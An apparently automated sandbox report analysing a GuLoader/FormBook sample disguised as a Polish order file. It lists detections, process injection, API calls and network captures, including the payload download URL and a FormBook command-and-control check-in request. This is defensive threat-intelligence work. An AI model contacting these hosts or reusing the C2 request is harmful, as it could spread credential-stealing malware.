Edit tour

Windows Analysis Report
Zamowienie_522025.exe

Overview

General Information

Sample name:	Zamowienie_522025.exe
Analysis ID:	1630058
MD5:	6907177f927c1938c734040d386da280
SHA1:	70fe16c259d1ff1b9dac5c35696229d200052c09
SHA256:	e4da98104281d7be4d50895dd76d5aeefa7bf7f25514a1581c7466bc694c3ea8
Tags:	exeuser-julianmckein
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Yara detected GuLoader

Found direct / indirect Syscall (likely to bypass EDR)

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Zamowienie_522025.exe (PID: 3636 cmdline: "C:\Users\user\Desktop\Zamowienie_522025.exe" MD5: 6907177F927C1938C734040D386DA280)

Zamowienie_522025.exe (PID: 1648 cmdline: "C:\Users\user\Desktop\Zamowienie_522025.exe" MD5: 6907177F927C1938C734040D386DA280)

2eU7UhU9Bd9ebl2M5FZ9.exe (PID: 5196 cmdline: "C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\geReVnuBo4LX3.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

RMActivate_ssp.exe (PID: 6320 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp.exe" MD5: 6599A09C160036131E4A933168DA245F)

2eU7UhU9Bd9ebl2M5FZ9.exe (PID: 2716 cmdline: "C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\nmm1Kmw0.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 4044 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.2065100585.00000000021C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.2518505143.00000000036F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.2518455903.00000000036A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.2515600733.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1406033202.00000000042D1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000009.00000002.2088072514.0000000032730000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000E.00000002.2518489403.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T14:45:11.301928+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	51633	104.21.94.11	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T14:45:40.425622+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49765	195.252.110.146	443	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T14:45:11.301928+0100	2855465	1	A Network Trojan was detected	192.168.2.7	51633	104.21.94.11	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Zamowienie_522025.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: Zamowienie_522025.exe	Virustotal: Detection: 36%			Perma Link
Source: Zamowienie_522025.exe	ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.2065100585.00000000021C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2518505143.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2518455903.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2515600733.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2088072514.0000000032730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2518489403.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Zamowienie_522025.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 195.252.110.146:443 -> 192.168.2.7:49765 version: TLS 1.2

Source: Zamowienie_522025.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: Zamowienie_522025.exe, 00000009.00000001.1403631513.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: rmactivate_ssp.pdb source: Zamowienie_522025.exe, 00000009.00000003.2026597151.00000000321C1000.00000004.00000020.00020000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000002.2517426237.000000000148E000.00000004.00000020.00020000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000002.2517055674.0000000001340000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Zamowienie_522025.exe, 00000009.00000002.2087643297.000000003257E000.00000040.00001000.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000002.2087643297.00000000323E0000.00000040.00001000.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1969302724.0000000032232000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1966643050.000000003208B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000003.2063030089.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000003.2066458610.0000000003856000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000002.2518825888.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000002.2518825888.0000000003A00000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Zamowienie_522025.exe, Zamowienie_522025.exe, 00000009.00000002.2087643297.000000003257E000.00000040.00001000.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000002.2087643297.00000000323E0000.00000040.00001000.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1969302724.0000000032232000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1966643050.000000003208B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 0000000F.00000003.2063030089.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000003.2066458610.0000000003856000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000002.2518825888.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000002.2518825888.0000000003A00000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Zamowienie_522025.exe, 00000009.00000001.1403631513.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000000.1982771460.000000000054F000.00000002.00000001.01000000.00000009.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 00000010.00000002.2515601948.000000000054F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: rmactivate_ssp.pdbGCTL source: Zamowienie_522025.exe, 00000009.00000003.2026597151.00000000321C1000.00000004.00000020.00020000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000002.2517426237.000000000148E000.00000004.00000020.00020000.00000000.sdmp, 2eU7UhU9Bd9ebl2M5FZ9.exe, 0000000E.00000002.2517055674.0000000001340000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 5_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	5_2_004059CC
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 5_2_004065FD FindFirstFileW,FindClose,	5_2_004065FD
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 5_2_00402868 FindFirstFileW,	5_2_00402868
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FCC510 FindFirstFileW,FindNextFileW,FindClose,	15_2_02FCC510

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 4x nop then xor eax, eax		15_2_02FB9F30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 4x nop then mov ebx, 00000004h		15_2_037F04ED

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:51633 -> 104.21.94.11:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:51633 -> 104.21.94.11:80

Source: global traffic

TCP traffic: 192.168.2.7:51592 -> 162.159.36.2:53

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49765 -> 195.252.110.146:443

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /cvpSZTky111.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: mastertechnics.co.rsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jlus/?OdQH=z8iiYw+Stw8cg8s0yCOm8FORRNTkmq1qJ2c0oLR1FTZ5MsQo40fD2YfHM+PHDiM3M0h9zAEgo28fhIzZNKCAdTen7c9YY8PKJLnaEMzq/uipFbl8xTPbmSxkYku39afrs4PwL2H3GZ4V&02W=1TxDX6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.frpisealbites.cyouConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.3)

Source: global traffic	DNS traffic detected: DNS query: mastertechnics.co.rs
Source: global traffic	DNS traffic detected: DNS query: www.frpisealbites.cyou

Source: Zamowienie_522025.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Zamowienie_522025.exe, 00000009.00000001.1403631513.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Zamowienie_522025.exe, 00000009.00000001.1403631513.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Zamowienie_522025.exe, 00000009.00000001.1403631513.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Zamowienie_522025.exe, 00000009.00000001.1403631513.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: RMActivate_ssp.exe, 0000000F.00000002.2515934645.000000000329B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service
Source: RMActivate_ssp.exe, 0000000F.00000002.2515934645.0000000003273000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RMActivate_ssp.exe, 0000000F.00000002.2515934645.000000000329B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: RMActivate_ssp.exe, 0000000F.00000002.2515934645.000000000329B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop
Source: RMActivate_ssp.exe, 0000000F.00000002.2515934645.000000000329B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000002.2515934645.0000000003273000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RMActivate_ssp.exe, 0000000F.00000002.2515934645.0000000003273000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: RMActivate_ssp.exe, 0000000F.00000002.2515934645.000000000329B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 0000000F.00000002.2515934645.0000000003273000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: RMActivate_ssp.exe, 0000000F.00000002.2515934645.000000000329B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: RMActivate_ssp.exe, 0000000F.00000003.2257862736.0000000008486000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: Zamowienie_522025.exe, 00000009.00000003.1967330215.0000000002105000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000002.2064924123.0000000002105000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1967019226.0000000002105000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mastertechnics.co.rs/
Source: Zamowienie_522025.exe, 00000009.00000003.1967330215.00000000020EB000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000002.2087239064.0000000031820000.00000004.00001000.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1967019226.0000000002105000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mastertechnics.co.rs/cvpSZTky111.bin
Source: Zamowienie_522025.exe, 00000009.00000002.2064924123.00000000020EC000.00000004.00000020.00020000.00000000.sdmp, Zamowienie_522025.exe, 00000009.00000003.1967330215.00000000020EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mastertechnics.co.rs/cvpSZTky111.bin/
Source: Zamowienie_522025.exe, 00000009.00000002.2064863170.00000000020E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mastertechnics.co.rs/cvpSZTky111.bin5
Source: RMActivate_ssp.exe, 0000000F.00000002.2521395487.0000000008498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443

Source: unknown

HTTPS traffic detected: 195.252.110.146:443 -> 192.168.2.7:49765 version: TLS 1.2

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

Code function: 5_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

5_2_00405461

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.2065100585.00000000021C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2518505143.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2518455903.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2515600733.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2088072514.0000000032730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2518489403.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_324535C0 NtCreateMutant,LdrInitializeThunk,	9_2_324535C0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32452C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_32452C70
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32452DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_32452DF0
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32453010 NtOpenDirectoryObject,	9_2_32453010
Source: C:\Users\user\Desktop\Zamowienie_522025.exe	Code function: 9_2_32453090 NtSetValueKey,	9_2_32453090
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A74340 NtSetContextThread,LdrInitializeThunk,	15_2_03A74340
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A74650 NtSuspendThread,LdrInitializeThunk,	15_2_03A74650
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72BA0 NtEnumerateValueKey,LdrInitializeThunk,	15_2_03A72BA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72BE0 NtQueryValueKey,LdrInitializeThunk,	15_2_03A72BE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_03A72BF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72B60 NtClose,LdrInitializeThunk,	15_2_03A72B60
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72AF0 NtWriteFile,LdrInitializeThunk,	15_2_03A72AF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72AD0 NtReadFile,LdrInitializeThunk,	15_2_03A72AD0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72FB0 NtResumeThread,LdrInitializeThunk,	15_2_03A72FB0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72FE0 NtCreateFile,LdrInitializeThunk,	15_2_03A72FE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72F30 NtCreateSection,LdrInitializeThunk,	15_2_03A72F30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72E80 NtReadVirtualMemory,LdrInitializeThunk,	15_2_03A72E80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72EE0 NtQueueApcThread,LdrInitializeThunk,	15_2_03A72EE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,	15_2_03A72DF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72DD0 NtDelayExecution,LdrInitializeThunk,	15_2_03A72DD0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72D30 NtUnmapViewOfSection,LdrInitializeThunk,	15_2_03A72D30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72D10 NtMapViewOfSection,LdrInitializeThunk,	15_2_03A72D10
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72CA0 NtQueryInformationToken,LdrInitializeThunk,	15_2_03A72CA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72C60 NtCreateKey,LdrInitializeThunk,	15_2_03A72C60
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_03A72C70
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A735C0 NtCreateMutant,LdrInitializeThunk,	15_2_03A735C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A739B0 NtGetContextThread,LdrInitializeThunk,	15_2_03A739B0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72B80 NtQueryInformationFile,	15_2_03A72B80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72AB0 NtWaitForSingleObject,	15_2_03A72AB0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72FA0 NtQuerySection,	15_2_03A72FA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72F90 NtProtectVirtualMemory,	15_2_03A72F90
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72F60 NtCreateProcessEx,	15_2_03A72F60
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72EA0 NtAdjustPrivilegesToken,	15_2_03A72EA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72E30 NtWriteVirtualMemory,	15_2_03A72E30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72DB0 NtEnumerateKey,	15_2_03A72DB0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72D00 NtSetInformationFile,	15_2_03A72D00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72CF0 NtOpenProcess,	15_2_03A72CF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72CC0 NtQueryVirtualMemory,	15_2_03A72CC0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A72C00 NtQueryInformationProcess,	15_2_03A72C00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A73090 NtSetValueKey,	15_2_03A73090
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A73010 NtOpenDirectoryObject,	15_2_03A73010
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A73D10 NtOpenProcessToken,	15_2_03A73D10
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_03A73D70 NtOpenThread,	15_2_03A73D70
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FD92F0 NtDeleteFile,	15_2_02FD92F0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FD9200 NtReadFile,	15_2_02FD9200
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FD9390 NtClose,	15_2_02FD9390
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FD9090 NtCreateFile,	15_2_02FD9090
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 15_2_02FD94F0 NtAllocateVirtualMemory,	15_2_02FD94F0

Source: C:\Users\user\Desktop\Zamowienie_522025.exe

Code function: 5_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

5_2_0040338F

